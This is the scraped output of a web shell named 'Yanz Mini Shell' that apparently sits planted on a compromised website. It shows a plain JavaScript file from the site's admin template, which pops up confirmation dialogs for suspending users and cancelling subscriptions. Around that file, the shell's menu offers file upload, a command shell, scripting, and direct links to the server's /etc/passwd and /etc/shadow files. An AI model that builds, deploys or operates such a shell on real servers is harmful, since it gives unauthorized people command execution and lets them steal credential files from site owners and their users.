Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * App User View - Suspend User Script */ 'use strict'; (function () { const suspendUser = document.querySelector('.suspend-user'); // Suspend User javascript if (suspendUser) { suspendUser.onclick = function () { Swal.fire({ title: 'Are you sure?', text: "You won't be able to revert user!", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, Suspend user!', customClass: { confirmButton: 'btn btn-primary me-2 waves-effect waves-light', cancelButton: 'btn btn-outline-secondary waves-effect' }, buttonsStyling: false }).then(function (result) { if (result.value) { Swal.fire({ icon: 'success', title: 'Suspended!', text: 'User has been suspended.', customClass: { confirmButton: 'btn btn-success waves-effect' } }); } else if (result.dismiss === Swal.DismissReason.cancel) { Swal.fire({ title: 'Cancelled', text: 'Cancelled Suspension :)', icon: 'error', customClass: { confirmButton: 'btn btn-success waves-effect' } }); } }); }; } //? Billing page have multiple buttons // Cancel Subscription alert const cancelSubscription = document.querySelectorAll('.cancel-subscription'); // Alert With Functional Confirm Button if (cancelSubscription) { cancelSubscription.forEach(btnCancle => { btnCancle.onclick = function () { Swal.fire({ text: 'Are you sure you would like to cancel your subscription?', icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes', customClass: { confirmButton: 'btn btn-primary me-2 waves-effect waves-light', cancelButton: 'btn btn-outline-secondary waves-effect' }, buttonsStyling: false }).then(function (result) { if (result.value) { Swal.fire({ icon: 'success', title: 'Unsubscribed!', text: 'Your subscription cancelled successfully.', customClass: { confirmButton: 'btn btn-success waves-effect' } }); } else if (result.dismiss === Swal.DismissReason.cancel) { Swal.fire({ title: 'Cancelled', text: 'Unsubscription Cancelled!!', icon: 'error', customClass: { confirmButton: 'btn btn-success waves-effect' } }); } }); }; }); } })();
Free Space : 107686686720 Byte